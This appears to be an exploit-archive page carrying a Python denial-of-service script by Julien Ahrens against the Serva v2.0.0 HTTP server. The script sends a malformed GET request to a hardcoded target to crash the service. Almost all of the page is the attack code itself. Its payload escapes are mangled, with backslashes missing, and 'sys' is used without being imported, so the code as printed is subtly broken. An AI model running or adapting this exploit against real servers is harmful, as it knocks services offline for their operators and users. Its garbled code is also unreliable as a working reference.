Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability
# Published : 2013-01-14
# Author :
# Previous Title : Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability
# Next Title : Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

#!/usr/bin/python

# Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed GET Request causes the crash
# Howto:         -
 
import socket

target="192.168.0.21"
port=80

# 0000   47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d  GET  / HTTP/1.1.
# 0010   0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39  .Host: http://19
# 0020   32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74  2.168.0.21..Cont
# 0030   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d  ent-Length: 0...
# 0040   0a                                               .

payload = (
"x47x45x54x20x20x20x2fx20x48x54x54x50x2fx31x2ex31x0d"+
"x0ax48x6fx73x74x3ax20x68x74x74x70x3ax2fx2fx31x39"+
"x32x2ex31x36x38x2ex30x2ex32x31x0dx0ax43x6fx6ex74"+
"x65x6ex74x2dx4cx65x6ex67x74x68x3ax20x30x0dx0ax0d"+
"x0a"
)

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #tcp
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respondn"
    sys.exit(0)

print "[*] Sending malformed request..."

s.send(payload)

print "[!] Exploit has been sent!n"
s.close()